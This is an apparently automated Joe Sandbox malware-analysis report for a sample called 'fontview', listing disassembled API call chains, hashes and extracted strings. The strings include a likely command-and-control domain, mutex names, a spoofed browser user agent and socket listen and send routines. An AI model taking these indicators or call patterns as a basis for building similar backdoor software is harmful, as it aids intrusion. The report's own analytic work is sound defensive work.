                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: acc1673d6148918c8941476ad3de64f7cc372316590d711c9c2354f11ed99ff7
                                                      • Instruction ID: d8f828a40b2b730194e8aba937afc0051e5cb378dd47fda6167a8c8fdc332205
                                                      • Opcode Fuzzy Hash: acc1673d6148918c8941476ad3de64f7cc372316590d711c9c2354f11ed99ff7
                                                      • Instruction Fuzzy Hash: 83F058325045139FE712DB1AE840F95F7E4EF907A2B224126E504A71A9CB30BCA1CBE0
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10009058
                                                        • Part of subcall function 10009005: __EH_prolog.LIBCMT ref: 1000900A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
                                                      • Instruction ID: c6297489b9343aa14daceb2b23b854b15629787c9eaf3216ec455666ea5a6765
                                                      • Opcode Fuzzy Hash: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
                                                      • Instruction Fuzzy Hash: 2DF0DA76900649AFDF01CFE8C801ADEB7B1FF48354F004425EA01E3211D7399A149BA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
                                                      • Instruction ID: d8b04152d89935f80a21dc8e5be05f0eecfdb8387a64987abe8c677b8d63aa7e
                                                      • Opcode Fuzzy Hash: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
                                                      • Instruction Fuzzy Hash: 82F0F2B6A04649AFEB01CFA8C501ADEB7B5EB08314F104466E901F7261D735AE158B66
                                                      APIs
                                                      • _malloc.LIBCMT ref: 1001A17E
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap_malloc
                                                      • String ID:
                                                      • API String ID: 501242067-0
                                                      • Opcode ID: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
                                                      • Instruction ID: 36140bd552ea7598696e433675d61f7601ae88bce914a68567ec45485bf916f3
                                                      • Opcode Fuzzy Hash: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
                                                      • Instruction Fuzzy Hash: BCF0D4B190AB908FC378CF29A541203FBE0AB187107108E2FE0EAC7B80D3B0A444CF58
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SleepThread$CloseHandleTerminate$closesocket$Create
                                                      • String ID:
                                                      • API String ID: 4110853011-0
                                                      • Opcode ID: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
                                                      • Instruction ID: 6a280082d855df33ede7dbe1d76fd2287fd5124dc276dd059ab29f99ddadefcf
                                                      • Opcode Fuzzy Hash: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
                                                      • Instruction Fuzzy Hash: 34E04874406BD16DF362D235894876B6ECCDF45354F45146DE483C7942D6B4FCC48761
                                                      APIs
                                                      • _free.LIBCMT ref: 1001A1BE
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
                                                      • Instruction ID: 93ea723e0ff4a37ebefb55af8edc70bf2818af01715938430097f1e814cd421c
                                                      • Opcode Fuzzy Hash: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
                                                      • Instruction Fuzzy Hash: 80E0B635040B10DED335DA14D4517EAB7E0EF14355F10881ED083068959BB5B4898B40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __fsopen
                                                      • String ID:
                                                      • API String ID: 3646066109-0
                                                      • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                      • Instruction ID: 13b5a6f81be809b2fbf7d3c091e96eb276c097e301d156e73de4e88552a403f5
                                                      • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                      • Instruction Fuzzy Hash: 60B0927654020C7BDE021E82EC02B49BB199B40665F008020FB0C1C261AA73A6A09689
                                                      APIs
                                                      • Sleep.KERNELBASE(00000064), ref: 1000D543
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
                                                      • Instruction ID: 41bad7438e7423b750e1fa2d8fabe618bb1bd2ce65775e71a8698d2292646254
                                                      • Opcode Fuzzy Hash: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
                                                      • Instruction Fuzzy Hash: 6BD0A53151491457F714A775DC0669E339CD700255F000356FC55531D4DF707D50C6D5
                                                      APIs
                                                      • socket.WS2_32(?,00000001,00000006), ref: 100224D7
                                                      • ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
                                                      • bind.WS2_32(?,00000002,0000001C), ref: 10022540
                                                      • SetLastError.KERNEL32(00000000), ref: 10022551
                                                      • listen.WS2_32(?,?), ref: 1002256F
                                                      • WSAGetLastError.WS2_32 ref: 100225A7
                                                      • GetLastError.KERNEL32 ref: 100225C5
                                                      • SetLastError.KERNEL32 ref: 100225DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$bindioctlsocketlistensocket
                                                      • String ID: 0.0.0.0$CTcpServer::CreateListenSocket
                                                      • API String ID: 2417606085-4023130488
                                                      • Opcode ID: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
                                                      • Instruction ID: 0924c4b3d37fc36c10ea38e20b5c0763d1d4709caa76c9637eac185a656b50da
                                                      • Opcode Fuzzy Hash: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
                                                      • Instruction Fuzzy Hash: 4F41B170500714AFE710EFB4E849B6BB7E9FF44305F40891EF846C6690EB75A814CB91
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000648C
                                                      • Sleep.KERNEL32(1005AFD8,?,00000000,00000000), ref: 100064C4
                                                      • __time64.LIBCMT ref: 100064CB
                                                      • __time64.LIBCMT ref: 10006498
                                                        • Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
                                                        • Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
                                                        • Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
                                                        • Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
                                                        • Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __time64$Local$AllocByteCharFreeH_prologMultiSleepWidechar_traits
                                                      • String ID:
                                                      • API String ID: 1349466670-0
                                                      • Opcode ID: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
                                                      • Instruction ID: 7cf599d640d092ba8d81afc26d70626d69daa3c1e3df8c3c9f01c42eb59162d8
                                                      • Opcode Fuzzy Hash: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
                                                      • Instruction Fuzzy Hash: E851B374208741AFE724DF24CC95A9AB7E5FF85390F504A2DF09946196DB30B948CB62
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100154FA
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 10015565
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
                                                      • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
                                                      • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015649
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015650
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 10015665
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015673
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 1001567B
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
                                                      • String ID: %s%s%saz$%^$%@#sdfs_12$13a.dh7483y.com$sadfasdf
                                                      • API String ID: 2639461599-2215545067
                                                      • Opcode ID: b16b4742c35ab07c610d918a26e68d810d87f54fbc90a7c4393e84a5bac5fafb
                                                      • Instruction ID: e3f48761596626cd4d4354f5a4ff52278281e6d761e45354df657ce548eb757b
                                                      • Opcode Fuzzy Hash: b16b4742c35ab07c610d918a26e68d810d87f54fbc90a7c4393e84a5bac5fafb
                                                      • Instruction Fuzzy Hash: 575160B1900218EFEB11DFA4CC959EDBBBCEF08350F54042AE505A7152D771AA45CFA5
                                                      APIs
                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727),00000001,00000000,00000000,00000000), ref: 1001046F
                                                      • GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 1001047B
                                                      • _wprintf.LIBCMT ref: 10010487
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000400,00000000), ref: 1001049C
                                                      • GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 100104A6
                                                      • _wprintf.LIBCMT ref: 100104B2
                                                      • InternetCloseHandle.WININET(00000000), ref: 100104BA
                                                      Strings
                                                      • InternetOpen error: %d, xrefs: 10010482
                                                      • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727), xrefs: 1001046A
                                                      • InternetOpenUrl error: %d, xrefs: 100104AD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$ErrorLastOpen_wprintf$CloseHandle
                                                      • String ID: InternetOpen error: %d$InternetOpenUrl error: %d$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
                                                      • API String ID: 4184951356-3019792808
                                                      • Opcode ID: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
                                                      • Instruction ID: fdd271cfc1952d43686e52e3cb2134a55a55c06e4c3b67e23485a96a698a7243
                                                      • Opcode Fuzzy Hash: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
                                                      • Instruction Fuzzy Hash: FE018F722015347BE720A7F59C8DDAB7F1CEF426B1F118109FB0896260DA609840C6E5
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10008012
                                                      • htonl.WS2_32(?), ref: 10008068
                                                      • __time64.LIBCMT ref: 100080A5
                                                      • htonl.WS2_32(00000017), ref: 1000821E
                                                      • htonl.WS2_32(?), ref: 10008224
                                                      • htonl.WS2_32(?), ref: 10008233
                                                      • htonl.WS2_32(?), ref: 1000823B
                                                      • _malloc.LIBCMT ref: 10008241
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _memmove.LIBCMT ref: 1000826B
                                                      • _free.LIBCMT ref: 1000828D
                                                      Strings
                                                      • Send Context:%s,time:%d,rand:%d, xrefs: 10008092
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htonl$AllocateH_prologHeap__time64_free_malloc_memmove
                                                      • String ID: Send Context:%s,time:%d,rand:%d
                                                      • API String ID: 1013815920-2080267509
                                                      • Opcode ID: cc96466e7b5b643448b77696e3deac728f8ff4df366bb23863d18f6bec68f1f4
                                                      • Instruction ID: 5ef619c4959f7fe7b54a5c6b697cdb2a2ac42440dc1d89eb5a562cbe716d77b1
                                                      • Opcode Fuzzy Hash: cc96466e7b5b643448b77696e3deac728f8ff4df366bb23863d18f6bec68f1f4
                                                      • Instruction Fuzzy Hash: 09814875D00219EFEF15DFA4C891AEEBBB9FF14350F50406AE40A67142DB30AA85CF60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
